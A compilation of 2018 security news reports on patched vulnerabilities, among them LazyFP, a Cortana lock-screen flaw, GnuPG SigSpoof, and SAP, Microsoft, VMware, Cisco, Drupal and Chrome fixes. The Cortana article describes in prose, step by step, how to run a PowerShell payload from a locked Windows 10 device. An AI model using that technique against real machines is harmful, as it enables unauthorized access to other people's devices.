“The register state of the floating point unit (FPU), which consists of the AVX, MMX and SSE register sets, can be leaked across protection domain boundaries. This includes leaking across process- and virtual machine boundaries.” reads the analysis published by Thomas Prescher, Julian Stecklina, Jacek Galowicz

“The FPU state may contain sensitive information such as cryptographic keys.”

According to the expert, the CVE-2018-3665 vulnerability is similar to Meltdown Variant 3a.

Intel confirms the CVE-2018-3665 vulnerability affects Core processors, but it claims the issue has been addressed by operating system and hypervisor software developers for many years, Intel urges vendors that still haven’t fixed the issue to do it as soon as possible by releasing necessary security updates.

Lazy FPU doesn’t affect systems using AMD or ARM processors, while Microsoft confirmed that “Lazy restore” is enabled by default in all versions of the operating system and cannot be disabled. Customers using the Azure platform are not affected by the problem.

LazyFP

Microsoft has yet to say exactly which versions of Windows are vulnerable, but the company noted that “Lazy restore” is enabled by default in all versions of the operating system and cannot be disabled. The tech giant assured customers that VMs running in Azure are not at risk.

“Is Lazy restore enabled by default and can it be disabled?

Lazy restore is enabled by default in Windows and cannot be disabled.” reads the FAQs published by Microsoft.

Recent versions of Linux kernel use Eager FPU this means that are not affected, while for older processors the flaw can be mitigated by enabling Eager FPU rebooting the kernel with the “eagerfpu=on” option.

AWS told its customers that its infrastructure is not affected.


Meltdown-Like 'LazyFP' Vulnerability Impacts Intel CPUs
15.6.2018 securityweek
Vulnerebility

Intel and software vendors have started informing users about a new vulnerability involving side channel speculative execution that could be exploited by malicious actors to obtain sensitive information from the targeted system.

Dubbed LazyFP, the security hole is related to the floating point unit (FPU), also known as the math coprocessor. The FPU is used by the operating system when switching between processes – it saves the state of the current process and restores the state of the new process.

There are two types of switching, Lazy FPU and Eager FPU switching. Lazy FPU switching provides some benefits for performance, but on modern systems the gain has become negligible, which has led to an increasing use of Eager switching.

Researchers discovered recently that if the Lazy method is used, it may be possible for an attacker to access FPU state data, which can contain sensitive information, such as cryptographic keys.LazyFP vulnerability found in Intel processors

“System software may opt to utilize Lazy FP state restore instead of eager save and restore of the state upon a context switch. Lazy restored states are potentially vulnerable to exploits where one process may infer register values of other processes through a speculative execution side channel that infers their value,” Intel said in an advisory.

The vulnerability, tracked as CVE-2018-3665, is similar to Meltdown, specifically Variant 3a, but the issue has been assigned only a “medium” severity rating.

Julian Stecklina from Amazon Germany, Thomas Prescher from Cyberus Technology and Zdenek Sojka from SYSGO AG have been credited for finding the vulnerability. Colin Percival has also been credited, but the researcher says he only wrote an exploit for the flaw.

Cyberus has published a blog post for the LazyFP vulnerability, but it has withheld some details at Intel’s request.

Each advisory, blog post and discussion focusing on LazyFP provides some clues as to which systems may be affected.

Intel says the vulnerability affects its Core processors, which are marketed as Xeon for servers. The company claims the issue has been addressed by operating system and hypervisor software developers for many years, and vendors that are still impacted should release updates in the coming weeks.

Systems using AMD or ARM processors do not appear to be impacted. “Based on our analysis to-date, we do not believe our products are susceptible to the recent security vulnerability identified around lazy FPU switching,” AMD told SecurityWeek.

Microsoft has yet to say exactly which versions of Windows are vulnerable, but the company noted that “Lazy restore” is enabled by default in all versions of the operating system and cannot be disabled. The tech giant assured customers that VMs running in Azure are not at risk.

AWS told customers that its infrastructure is not affected, but advised them to ensure their operating systems are always up to date. The Xen Project says systems running any version of Xen are vulnerable.

In the case of Linux, recent versions of the kernel use Eager FPU. On systems using older processors, the vulnerability can be mitigated by booting the kernel with the “eagerfpu=on” parameter to enable Eager FPU. Red Hat, DragonflyBSD and OpenBSD have published advisories.


Cortana Flaw Allows for Code Execution from Lock Screen
15.6.2018 securityweek
Vulnerebility

One of the vulnerabilities Microsoft addressed with the June 2018 security patches was a flaw in Cortana that could allow an attacker to elevate privileges and execute code from the lock screen.

The issue, discovered by Cedric Cochin, Cyber Security Architect and Senior Principle Engineer at McAfee, is tracked as CVE-2018-8140. The bug can be abused to execute code on the impacted machine, directly from the lock screen.

In an advisory, Microsoft explains that the vulnerability “exists when Cortana retrieves data from user input services without consideration for status.” The company confirms the possible exploitation to execute commands with elevated permissions.

The vulnerability requires physical access to the impacted device and appears connected to a flaw independent researchers Amichai Shulman and Tal Be'ery detailed in March, and which could be abused to install malware on the affected computers.

In order to exploit the issue, an attacker with access to the impacted computer needs to have Cortana assistance enabled. A user can interact with the voice-based assistant even from the lock screen, by saying “Hey Cortana.”

Cortana can also be tricked to display search results with the contextual search menu, from the lock screen. This, however, requires the use of a keyboard-timing sequence: “any keystroke can trigger the menu from the time when Cortana begins to listen to when the answer is displayed.”

According to Cochin, because Windows indexes file content, including strings in documents, Cortana can be abused to leak sensitive information. Specifically, if the right search phrase is used when clicking on the “tap and say” button, Cortana could show the content of confidential files, such as those storing passwords.

“Armed with this knowledge, you can use your imagination to come up with specific keywords that could be used to start harvesting confidential information from the locked device,” the researcher notes.

Cortana attack leaks passwords

When hovering over a file in the search results provided by Cortana, the full path or content of the file would be displayed. When clicking on the file, it is launched using the appropriate program, but would only be accessible after the user logs in.

“At this point we can execute various preloaded Windows utilities such as calculator, but we cannot pass any parameters to the command line. We can open scripts including PowerShell, but instead of being executed, they will be opened in a text editor (notepad),” Cochin says.

Basically, “live off the land” attacks that abuse existing tools for malicious purposes cannot be performed because of a lack of parameters. Other nefarious operations, however, such as uninstalling applications, are possible even with these restrictions in place.

To execute code from the lock screen using Cortana, one would need to make sure the code is indexed (appears in the contextual menu). To get results to show up in the index of an authenticated user, an attacker can abuse OneDrive, where the contents of all shared folders with “edit” rights are indexed.

Thus, an attacker can drop an executable in the OneDrive folder, which can then even be executed as an administrator by simply right-clicking on it and selecting the “Run as administrator” option. Although a user account control (UAC) prompt could be triggered, the attack might still work, as users rarely check the content of the prompt before clicking through it.

Another option the attacker has is to use a non-portable executable (PE) malicious program, such as a PowerShell script. However, Cortana would only allow for the editing of such files, and would open them in Notepad instead of the default editor (PowerShell ISE).

When searching for txt, however, Cortana would display not only the text files, but also recently opened ones, such as the PowerShell script, and would provide a different contextual menu for them. Thus, an attacker could first edit the script, then search for txt, and simply select “Run with PowerShell” from the right-click menu.

“We now have local code execution with the payload of our choosing, without any exploit, even if the device is encrypted, on an up-to-date locked Windows 10 device. This technique helps us understand some of the differences between apps, documents, extensions, and the way Windows handles them from a locked or unlocked screen,” the security researcher explains.

Although code execution is now possible, there are limitations, as no command-line parameters can be passed. However, because it is possible to use the keyboard in addition to voice commands when interacting with Cortana from the lock screen, an attacker could use this to run the PowerShell code as an administrator.

“What can we do at this point? You name it. Our demo shows a password reset and login on a Windows 10 build, using only this simple technique,” the researcher notes.

To prevent exploitation of the vulnerability, even if it can only be abused with physical access to the vulnerable machine, one could turn off Cortana on the lock screen. Installing the recently released fixes for CVE-2018-8140 also mitigates the attack.


GnuPG Vulnerability Allows Spoofing of Message Signatures
15.6.2018 securityweek
Vulnerebility

GnuPG recently addressed an input sanitization vulnerability where a remote attacker could spoof arbitrary signatures.

Part of the GNU Project and also known as GPG, GnuPG is a complete and free implementation of the OpenPGP standard that enables the encryption and signing of data and communications. The hybrid-encryption software program has a versatile key management system and access modules for all kinds of public key directories.

Released earlier this month, GnuPG version 2.2.8 addresses CVE-2018-12020, a vulnerability affecting GnuPG, Enigmail, GPGTools and python-gnupg, Marcus Brinkmann, who discovered the bug, reveals. Brinkmann has dubbed the flaw SigSpoof.

“The signature verification routine in Enigmail 2.0.6.1, GPGTools 2018.2, and python-gnupg 0.4.2 parse the output of GnuPG 2.2.6 with a ‘--status-fd 2’ option, which allows remote attackers to spoof arbitrary signatures via the embedded ‘filename’ parameter in OpenPGP literal data packets, if the user has the verbose option set in their gpg.conf file,” he notes.

Status messages, GnuPG maintainer Werner Koch explains, are parsed by programs to get information from GPG about the validity of a signature. Status messages are created with the option “--status-fd N,” where N is a file descriptor. If N is 2, status messages and regular diagnostic messages share the stderr output channel.

The issue resides in the OpenPGP protocol allowing the inclusion of the file name of the original input file into a signed or encrypted message. The GnuPG tool can display a notice with that file name during decryption and verification, but it does not sanitize the file name, meaning that an attacker could include line feeds or other control characters in it.

Because of that, terminal control sequences could be injected, and the so-called status messages could be faked. Furthermore, the verification status of a signed email could also be faked.

“The attacker can inject arbitrary (fake) GnuPG status messages into the application parser to spoof signature verification and message decryption results. The attacker can control the key IDs, algorithm specifiers, creation times and user ids, and does not need any of the private or public keys involved,” Brinkmann explains.

He also notes that status messages need to fit into 255 characters, this being the limitation for the “name of the encrypted file” in OpenPGP.

Brinkmann also published a proof of concept to show how signatures can be spoofed in Enigmail and GPGTools, and another to show how both the signature and encryption can be spoofed in Enigmail. Signature spoofing is also possible on the command line, he demonstrated.

While disabled by default, verbose is included in several recommended configurations for GnuPG, and it is one of the main causes for this vulnerability.

According to the researcher, users should make sure they don’t have verbose in gpg.conf and should avoid using gpg --verbose on the command line. Developers are advised to add --no-verbose to all invocations of gpg.

“The vulnerability in GnuPG goes deep and has the potential to affect a large part of our core infrastructure. GnuPG is not only used for email security, but also to secure backups, software updates in distributions, and source code in version control systems like Git,” Brinkmann claims.


Analyzing the SAP June 2018 Security Patch Day
15.6.2018 securityaffairs
Vulnerebility   

SAP June 2018 Security Patch Day addresses two security notes, the company fixed five issues for previously released notes, including two critical flaws rated Hot News.
The most common flaw types are Cross-Site Scripting and Remote Command Execution, followed by implementation flaws and information disclosure.

“It seems that the downward trend in the number of monthly notes is continuing. This month, a total of 14 security notes has been released, with only seven notes published today. Seven notes in total (50%) are tagged as High Priority or Hot News.” reads the post published by Onapsis.

The two Hot News Security Notes received CVSS scores of 9.8 and 9.1, respectively, they affect SAP Business Client (version 6.5) and SAP BASIS (versions 7.31, 7.40, 7.50, 7.51, 7.65, 7.66).

The first update is related to a Security Note released on April 2018 Patch Day, it addresses third-party web browser controls delivered with SAP Business Client, while the latter is an update for a Note released on November 2016 Patch Day that addresses an OS command injection vulnerability in the Report for Terminology Export component.

SAP June 2018 Security Patch Day also addresses four High severity vulnerabilities and four Medium risk flaws.

“On 12th of June 2018, SAP Security Patch Day saw the release of 5 Security Notes. Additionally, there were 5 updates to previously released security notes.” states the SAP’s advisory.

The most severe high-risk flaw is an information disclosure vulnerability tracked as CVE-2018-2425 affects the SAP Business One- The flaw resides in the Business One version for the SAP HANA backup service and could be exploited by an attacker to access restricted information.

“[CVE-2018-2425] Information Disclosure in SAP Business One for SAP HANA Backup Service (#2588475): Business One is SAP’s more lightweight ERP system designed for small to medium-sized businesses. The vulnerability discussed in the note exists in the Business One version for SAP HANA, more specifically in its backup service.” continues the analysis published by Onapsis.

“The note does not contain many details, but mentions the vulnerability allows an attacker to access information which would otherwise be restricted. It does seem the sensitive information exists in the backup service logs. The fix implies updating your Business One component software.”

The SAP June 2018 Security Patch Day also addresses a remote command execution flaw tracked as CVE-2015-0899 that affects SAP Internet Sales and DoS issue tracked as CVE-2014-0050 that affects SAP Internet Sales.

SAP also addressed the CVE-2018-2408 flaw described as an improper session management bug in SAP Business Objects.


SAP Releases Critical Updates for Two Security Notes
13.6.2018 securityweek 
Vulnerebility

Of the ten Security Notes in SAP’s June 2018 Security Patch Day, five were updates for previously released Notes, including two rated Hot News (Critical severity).

Impacting SAP Business Client (version 6.5) and SAP BASIS (versions 7.31, 7.40, 7.50, 7.51, 7.65, 7.66), the two Hot News Security Notes feature CVSS scores of 9.8 and 9.1, respectively.

The former is an update for a Security Note released on April 2018 Patch Day, described as security updates for third party web browser controls delivered with SAP Business Client, while the latter is an update for a Note released on November 2016 Patch Day, described as an OS command injection vulnerability in the Report for Terminology Export component.

The remaining Security Notes address four vulnerabilities considered High severity (including an update to a Security Note released on April 2018 Patch Day) and four Medium risk flaws (two are updates to Security Notes released on August 2014 Patch Day and May 2018 Patch Day, respectively), SAP’s advisory reveals.

The most important of the high-risk flaws is an information disclosure vulnerability (CVE-2018-2425) in SAP Business One (CVSS Base Score: 8.4). The bug exists in the Business One version for the SAP HANA backup service and could allow an attacker to access information which would otherwise be restricted, Onapsis explains.

Next in line is a remote command execution flaw (CVE-2015-0899) in SAP Internet Sales (CVSS Base Score: 7.5), followed by a denial-of-service bug (CVE-2014-0050) in SAP Internet Sales (CVSS Base Score: 7.3).

The last high-risk Security Note released this month is an update to a previous Note addressing CVE-2018-2408 (CVSS Base Score: 7.3), an improper session management bug in SAP Business Objects.

The Medium risk flaws addressed this month include a cross-site scripting (XSS) vulnerability in SAPUI5 (CVE-2018-2424) and information disclosure in UI5 Handler (CVE-2018-2428). They are accompanied by an update to a Security Note addressing a potential remote code execution in SAP CrystalReports, and another patching a missing XML validation vulnerability in SAP Identity Management (CVE-2018-2416).

According to ERPScan, a company that secures Oracle and SAP products, the June 2018 Patch Day also includes 4 Support Package Notes, for a total of 14 Notes. Half of the Notes were released after the second Tuesday of the last month and before the second Tuesday of this month.

The most common vulnerability types addressed this month are XSS and remote command execution, followed by implementation flaws and information disclosure. SAP also addressed XML external entity, DoS, OS command execution, and buffer overflow issues.


Microsoft Releases Mitigations for Spectre-Like 'Variant 4' Attack
13.6.2018 securityweek 
Vulnerebility

Updates released by Microsoft on Tuesday for its Windows operating system add support for a feature that should prevent attacks involving the recently disclosed speculative execution vulnerability known as “Variant 4.”

Researchers from several organizations warned in January that processors from Intel, AMD, ARM and other companies are affected by vulnerabilities that allow malicious applications to bypass memory isolation mechanisms and gain access to sensitive data. The flaws are tracked as Spectre (Variant 1 - CVE-2017-5753 and Variant 2 - CVE-2017-5715) and Meltdown (Variant 3 - CVE-2017-5754).

Last month, Intel, AMD, ARM, IBM, Microsoft and other major tech companies released updates, mitigations and advisories for two new variants of the speculative execution attack methods, namely Variant 3a and Variant 4.

Variant 4, which is similar to Spectre Variant 1, relies on a side-channel vulnerability known as Speculative Store Bypass (SSB) and it has been assigned the identifier CVE-2018-3639.

Microsoft has not identified any code patterns – in either its software or cloud services – that would allow Variant 4 attacks. However, the company announced on Tuesday – along with its monthly security updates – that it added support for Speculative Store Bypass Disable (SSBD) to Windows and Azure in an effort to completely eliminate the risk of attacks.

SSBD is designed to prevent a Speculative Store Bypass from occurring, but Microsoft noted that enabling the feature also requires microcode updates from Intel.

Microsoft has released updates that include the mitigation for Windows 10, Windows 7, Windows Server 2008, Windows Server 2016, and Windows Server versions 1709 and 1803. Support for SSBD has only been added for machines with Intel processors, but the company is working on updates for AMD devices as well. Systems powered by AMD CPUs will not require microcode updates.

When Variant 4 was disclosed, Intel announced that it had provided beta microcode updates to operating system vendors and equipment manufacturers to add support for SSBD.

However, Intel says the mitigation will be turned off by default and the company believes many will leave it that way.

Enabling SSBD may have some negative impact on performance, Microsoft and Intel said. Intel told customers last month that performance impact during its tests ranged between 2 and 8 percent.


Microsoft Patches 11 Critical RCE Flaws in Windows, Browsers
13.6.2018 securityweek 
Vulnerebility

Microsoft’s Patch Tuesday updates for June 2018 address a total of 50 vulnerabilities, including nearly a dozen critical remote code execution flaws affecting Windows and the company’s Edge and Internet Explorer web browsers.

None of the security holes patched this month appear to have been exploited for malicious purposes, but one of them has been publicly disclosed before the release of a fix. The disclosed vulnerability is a use-after-free issue that allows an attacker to execute arbitrary code if they can convince the targeted user to open a malicious web page or file. The weakness was reported to Microsoft through Trend Micro’s Zero Day Initiative (ZDI), which made some details public after its 120-day deadline expired.

The list of critical vulnerabilities also includes CVE-2018-8225, which impacts the Windows DNS component DNSAPI.dll. An attacker can leverage this flaw to execute arbitrary code in the context of the Local System Account by using a malicious DNS server to send specially crafted DNS responses to the targeted system.

Another critical RCE flaw, which Microsoft believes could be exploited in the wild at some point, is CVE-2018-8251 and it impacts the Windows Media Foundation component. An attacker can exploit this flaw to take complete control of a system by getting the targeted user to open a malicious web page or document.

A security hole affecting the HTTP Protocol Stack (Http.sys) allows remote code execution by sending a specially crafted packet to the targeted server. While the flaw can be exploited without authentication and is considered critical, Microsoft believes exploitation is “less likely.”

The latest security updates also resolve a privilege escalation vulnerability affecting the Cortana voice assistant. The flaw, related to an issue disclosed earlier this year by researchers Amichai Shulman and Tal Be’ery, has been classified as “important” as exploitation requires physical or console access and the targeted system needs to have Cortana enabled.

Microsoft also released some mitigations for the recently disclosed Variant 4 of the Spectre/Meltdown vulnerabilities.

Adobe has yet to release any Patch Tuesday updates, but the company did resolve a Flash Player zero-day vulnerability earlier this month. The researchers who came across the exploit revealed that the flaw had been leveraged in attacks aimed at entities in the Middle East.


Microsoft Patch Tuesday updates for June 2018 addresses 11 Critical RCE Flaws
13.6.2018 securityaffairs
Vulnerebility

Microsoft issued Patch Tuesday updates for June 2018 that address a total of 50 vulnerabilities, 11 of which are critical remote code execution flaws.
Microsoft issued Patch Tuesday updates for June 2018 that address a total of 50 flaws, 11 critical remote code execution vulnerabilities and 39 issues rated as important.

The tech giant also issued some mitigations for the recently discovered Spectre/Meltdown Variant 4 vulnerabilities.

The critical issues affect Windows and the company web browsers Edge and Internet Explorer.

None of the patched vulnerabilities have been exploited in attacks in the wild, only one of them, a remote code execution flaw in the scripting engine tracked as CVE-2018-8267 has been publicly disclosed before the release of a fix.

The flaw is a remote memory-corruption issue affecting Microsoft Internet Explorer that resides within the IE rendering engine. The flaw is triggered when the engine fails to properly handle the error objects, the attack could exploit the issue to execute arbitrary code in the context of the currently logged-in user.

Microsoft acknowledged the security researcher Dmitri Kaslov for reporting the flaw.

The most critical flaw addressed by the Patch Tuesday updates for June 2018 is a remote code execution vulnerability tracked as CVE-2018-8225 that resides in Windows Domain Name System (DNS) DNSAPI.dll.

The flaw affects all versions of Windows starting from 7 to 10, as well as Windows Server editions, it ties the way Windows parses DNS responses.

An attacker could exploit the flaw by sending corrupted DNS responses to a targeted system from an attacker-controlled malicious DNS server. Once the attacker has exploited the flaw he will be able to run arbitrary code in the context of the Local System Account.

“This vulnerability could allow an attacker to execute code at the local system level if they can get a crafted response to the target server. There are a couple of ways this could happen.” reads the analysis published by Trend Micro Zero Day Initiative (ZDI).

“The attacker could attempt to man-in-the-middle a legitimate query. The more likely scenario is simply tricking a target DNS server into querying an evil server that sends the corrupted response – something that can be done from the command line. It’s also something that could be easily scripted. This means there’s a SYSTEM-level bug in a listening service on critical infrastructure servers, which also means this is wormable.”

Microsoft Patch Tuesday updates for June 2018

Another critical flaw addressed with the Patch Tuesday updates for June 2018 is a remote code execution flaw tracked as CVE-2018-8231 that resides in the HTTP protocol stack (HTTP.sys) of Windows 10 and Windows Server 2016.

The flaw could allow remote attackers to execute arbitrary code and take control of the affected systems.

This vulnerability originates when HTTP.sys improperly handles objects in memory, allowing attackers to send a specially crafted packet to an affected Windows system to trigger arbitrary code execution.

“This patch covers another serious bug in a web-facing service. This time, the web server component http.sys is affected. A remote attacker could cause code execution by sending a malformed packet to a target server. Since http.sys runs with elevated privileges, the attacker’s code would get that same privilege. ” continues ZDI.

The Patch Tuesday updates for June 2018 also addresses a privilege escalation vulnerability affecting the Cortana voice assistant. The flaw, tracked as CVE-2018-8140, is a privilege escalation vulnerability rated as “important.”

In this case, the attacker needs physical or console access to the system to trigger the flaw.


VMware addresses a critical remote code execution vulnerability in AirWatch Agent
12.6.2018 securityaffairs
Vulnerebility

VMware has found a critical remote code execution vulnerability in the AirWatch Agent applications for Android and Windows Mobile.
The agent is installed by users on a mobile device in order to allow the AirWatch to manage it.

The flaw, tracked as CVE-2018-6968, “may allow for unauthorized creation and execution of files in the Agent sandbox and other publicly accessible directories such as those on the SD card by a malicious administrator.”

“Due to an authorization flaw in the real-time File Manager capability for Android and Windows Mobile devices and Registry Manager for Windows Mobile devices, it is possible for a remote attacker with knowledge of specific enrolled devices within an AirWatch instance to add or remove files from a device, remotely execute commands on the device, or modify or set Registry Key values for Windows Mobile devices that are configured to use AirWatch Cloud Messaging (AWCM).” reads the advisory published by VMware.

“This vulnerability is identified by CVE-2018-6968 and is documented in VMSA-2018-0015”

“The attacker does not need access to the Workspace ONE UEM Console. Access to read and store files on Android devices is limited to files within the Agent sand­­box and other publicly accessible directories such as those on the SD card. Access to files on Windows Mobile/CE devices involves the entire device directory,” it added.

VMware airwatch

VMware has addressed the flaw with the release of version 8.2 for Android and 6.5.2 for Windows Mobile, iOS version of the VMware AirWatch agent is not impacted.

Experts also provided a workaround for Android users who can choose C2DM/GCM instead of AWCM as their preferred push notification service.

The security updates address the vulnerability by disabling the flawed file, task, and registry management capabilities. VMware will deprecate the functionality in the next months.

“Through mitigation of this security vulnerability, the File, Task & Registry Management capabilities built into AWCM will be disabled in current SaaS environments over the coming weeks. Additionally, this functionality will be deprecated in future releases of the Workspace ONE UEM Console.”


VMware Patches Code Execution Flaw in AirWatch Agent
12.6.2018 securityweek 
Vulnerebility

VMware has addressed a critical remote code execution vulnerability in the AirWatch Agent applications for Android and Windows Mobile.

The VMware Workspace ONE platform, which is powered by AirWatch unified endpoint management (UEM) technology, is designed to help organizations manage corporate endpoints and improve enterprise productivity.

Workspace ONE provides a File Manager application for Android and Windows Mobile/CE and Task/Registry Manager apps for Windows Mobile/CE. These apps use legacy technologies and they are separate from the ones available through the AirWatch platform.

VMware has published an advisory and a support article to warn users that these mobile applications are affected by a critical vulnerability tracked as CVE-2018-6968.

“Due to an authorization flaw in the real-time File Manager capability for Android and Windows Mobile devices and Registry Manager for Windows Mobile devices, it is possible for a remote attacker with knowledge of specific enrolled devices within an AirWatch instance to add or remove files from a device, remotely execute commands on the device, or modify or set Registry Key values for Windows Mobile devices that are configured to use AirWatch Cloud Messaging (AWCM),” VMware said.

“The attacker does not need access to the Workspace ONE UEM Console. Access to read and store files on Android devices is limited to files within the Agent sand­­box and other publicly accessible directories such as those on the SD card. Access to files on Windows Mobile/CE devices involves the entire device directory,” it added.

The security hole has been patched with the release of version 8.2 for Android and 6.5.2 for Windows Mobile. The iOS version of the agent is not impacted.

The updates address the problem by disabling the flawed file, task and registry management capabilities, and VMware says it plans on deprecating the functionality in future releases of the Workspace ONE console.

In late May, VMware informed customers of a vulnerability that allowed a local attacker to escalate privileges to root on Linux machines running VMware Horizon Client for Linux.


Cisco removed hardcoded credentials in WAAS software. Undocumented accounts are a frequent issue
9.6.2018 securityaffairs  
Vulnerebility

Cisco has removed hardcoded credentials that were in Cisco Wide Area Application Services (WAAS), which is a software designed to optimize WAN traffic management.
The hardcoded credentials (CVE-2018-0329) resides in the read-only SNMP community string in the configuration file of the SNMP daemon, they could be exploited by attackers to read any data that is accessible via SNMP on the affected device.

“A vulnerability in the default configuration of the Simple Network Management Protocol (SNMP) feature of Cisco Wide Area Application Services (WAAS) Software could allow an unauthenticated, remote attacker to read data from an affected device via SNMP.” states the security advisory published by Cisco.

“The vulnerability is due to a hard-coded, read-only community string in the configuration file for the SNMP daemon. An attacker could exploit this vulnerability by using the static community string in SNMP version 2c queries to an affected device.”

There are no workarounds that address this vulnerability.

The SNMP community string is hidden from administrators this means that there was no way to see the find the vulnerability during regular audits of the architecture.

The flaw was reported by the security researcher Aaron Blair while investigating the CVE-2018-0352 WaaS vulnerability, a flaw that affects the Cisco Wide Area Application Services Software Disk Check Tool that could lead privilege escalation.

“A vulnerability in the Disk Check Tool (disk-check.sh) for Cisco Wide Area Application Services (WAAS) Software could allow an authenticated, local attacker to elevate their privilege level to root. The attacker must have valid user credentials with super user privileges (level 15) to log in to the device.” reads the security advisory.

“The vulnerability is due to insufficient validation of script files executed in the context of the Disk Check Tool. An attacker could exploit this vulnerability by replacing one script file with a malicious script file while the affected tool is running. A successful exploit could allow the attacker to gain root-level privileges and take full control of the device.”

This CVE-2018-0352 vulnerability was a privilege escalation in the WaaS disk check tool, Blair exploited it to elevate his privilege to “root,” an access level that allowed him to discoverer the hidden SNMP community string inside the /etc/snmp/snmpd.conf file.

CISCO hardcoded credentials

Unfortunately, hardcoded credentials and undocumented accounts are not uncommon in Cisco appliance, the company addressed similar issues in the Prime Collaboration Provisioning (PCP), in the CISCO IOS XE operating system, and the Digital Network Architecture (DNA) Center.


Cisco patches a critical vulnerability in Prime Collaboration Provisioning solution
9.6.2018 securityaffairs
Vulnerebility

Cisco fixed several flaws in the Prime Collaboration Provisioning product that allows customers to manage their communications services.
Cisco released security patches to address severe vulnerabilities in Prime Collaboration Provisioning (PCP) solution, one of the issues was rated as critical.

The vulnerabilities have been found by Cisco during internal security testing and there is no evidence of attacks exploiting the flaws in the wild.

The Prime Collaboration Provisioning is a web-based provisioning product that allows its customers to manage their communications services.

The critical vulnerability, tracked as CVE-2018-0321, could be exploited by a remote and unauthenticated attacker to access the Java Remote Method Invocation (RMI) system and perform malicious actions that affect both the PCP and the devices connected to the solution.

“A vulnerability in Cisco Prime Collaboration Provisioning (PCP) could allow an unauthenticated, remote attacker to access the Java Remote Method Invocation (RMI) system.” reads the security advisory published by Cisco.

“The vulnerability is due to an open port in the Network Interface and Configuration Engine (NICE) service. An attacker could exploit this vulnerability by accessing the open RMI system on an affected PCP instance. An exploit could allow the attacker to perform malicious actions that affect PCP and the devices that are connected to it.”

Cisco confirmed that there are no workarounds that address this vulnerability.

Cisco also reported five high severity vulnerabilities in the Prime Collaboration Provisioning solution, two of which could be exploited by an unauthenticated attacker to reset the password on vulnerable products and gain admin-level privileges by sending a specially crafted password reset request.

Another high severity vulnerability could be exploited by an unauthenticated attacker to execute arbitrary SQL queries. Cisco also fixed high severity access control vulnerabilities that could lead privileges escalation.

Customers need to update their Prime Collaboration Provisioning products by updating them to version 12.3.

The flaws have been identified by experts from Cisco during internal security testing.

Prime Collaboration Provisioning solution

Cisco also fixed an information disclosure bug in Meeting Server, and a DoS vulnerability that affects several products of the IT giant.


Drupal Refutes Reports of 115,000 Sites Still Affected by Drupalgeddon2
8.6.2018 securityweek
Vulnerebility

The Drupal Security Team has refuted reports that at least 115,000 websites are still vulnerable to Drupalgeddon2 attacks, arguing that the methodology used by the researcher who announced that number is flawed.

Researcher Troy Mursch recently conducted an analysis of websites running Drupal 7, the most widely used version of the content management system (CMS), and apparently found that many of them had still not patched the Drupalgeddon2 vulnerability.

Mursch identified nearly 500,000 Drupal 7 websites through the PublicWWW source code search engine and found that 115,070 had been running older versions of the CMS. The analysis showed that roughly 134,000 sites had not been vulnerable, while for 225,000 the version of Drupal they had been using could not be determined.

These numbers are apparently based on data from the publicly accessible “CHANGELOG.txt” file found on each website – sites using Drupal 7.58 or a later version were classified as not vulnerable while earlier versions were counted as affected.

“Checking the contents of CHANGELOG.txt is not a valid way to determine whether a site is vulnerable to any given attack vector,” the Drupal Security Team said in a statement posted on its website and sent out to journalists. “Patches distributed by the Drupal security team to fix the issues were widely used, but did not touch CHANGELOG.txt or any version strings defined elsewhere. There are also other mitigations that vendors have provided which would also not affect CHANGELOG.txt but would protect the site.”

“We believe the presented numbers to be inaccurate. We consider it to be misleading to draw conclusions from this sparse information,” it added.

In an update to his initial blog post, Mursch says it’s impossible to determine exactly how many Drupal websites are still vulnerable to Drupalgeddon2 attacks without actually attempting to exploit the vulnerability.

“While we know 115,000 sites are using outdated Drupal versions, based on the publically accessible CHANGELOG.txt found on each site, it’s possible someone applied a mitigation patch. However, the problem is we have no way of telling if they did unless we perform the actual exploit,” Mursch said.

“Unfortunately, attempting the exploit on nearly half a million sites would be highly illegal. Due to this, I won’t be performing the exploit or any variant of it to prove all the sites are vulnerable. The fact remains that each one of the 115,000 sites is using an outdated version Drupal,” he added.

Drupalgeddon2, tracked as CVE-2018-7600, allows a remote attacker to execute arbitrary code and take complete control of a website running Drupal 6, 7 or 8. The flaw has been patched with the release of versions 7.58, 8.5.1, 8.3.9 and 8.4.6, with fixes also available for the outdated Drupal 6.

Drupalgeddon2 has been exploited by malicious actors to deliver cryptocurrency miners, backdoors, RATs and tech support scams.

During the analysis of Drupalgeddon2, the Drupal Security Team and the developer who reported the original vulnerability identified another flaw. This second vulnerability, tracked as CVE-2018-7602 and dubbed by some Drupalgeddon3, has also been exploited in the wild.


Cisco Patches Severe Vulnerabilities in Prime Collaboration Provisioning
8.6.2018 securityweek
Vulnerebility

Cisco informed customers this week that it has patched one critical and five high severity vulnerabilities in Prime Collaboration Provisioning (PCP), a web-based provisioning solution that allows organizations to manage their communications services.

The critical flaw, CVE-2018-0321, allows a remote and unauthenticated attacker to access the Java Remote Method Invocation (RMI) system and perform actions that affect both the PCP and the devices connected to it.

The list of high severity vulnerabilities affecting PCP includes two issues that allow an unauthenticated attacker to reset the password on affected systems and gain admin-level privileges by sending a specially crafted password reset request.

Another high severity bug allows an unauthenticated attacker to execute arbitrary SQL queries. The remaining high severity vulnerabilities are access control issues that allow authenticated attackers to elevate their privileges.

Users can patch all the PCP vulnerabilities by updating to version 12.3, but fixes for some of these flaws are included in versions 12.1 and 12.2. The security holes have been identified by Cisco during internal security testing and there is no evidence of exploitation in the wild.

Cisco also fixed a critical vulnerability, tracked as CVE-2018-0315, it the authentication, authorization, and accounting (AAA) security services of Cisco IOS XE software. An attacker can exploit this flaw remotely to execute arbitrary code on a device or cause a denial-of-service (DoS) condition.

Other high severity problems patched this week include DoS vulnerabilities in IP Phone and Adaptive Security Appliance (ASA) products, a security bypass in Cisco Web Security Appliance (WSA), and a command execution vulnerability in Network Services Orchestrator (NSO).

Cisco’s advisories also describe an information disclosure bug in Meeting Server, and a DoS vulnerability impacting multiple products.

Patches are available for all these flaws and there is no evidence of malicious exploitation.


Update Google Chrome Immediately to Patch a High Severity Vulnerability
8.6.2018 thehackernews 
Vulnerebility

You must update your Google Chrome now.
Security researcher Micha³ Bentkowski discovered and reported a high severity vulnerability in Google Chrome in late May, affecting the web browsing software for all major operating systems including Windows, Mac, and Linux.
Without revealing any technical detail about the vulnerability, the Chrome security team described the issue as incorrect handling of CSP header (CVE-2018-6148) in a blog post published today.
"Access to bug details and links may be kept restricted until a majority of users are updated with a fix. We will also retain restrictions if the bug exists in a third party library that other projects similarly depend on, but haven't yet fixed," the Chrome security team notes.
Content Security Policy (CSP) header allows website administrators to add an extra layer of security on a given web page by allowing them to control resources the browser is allowed to load.


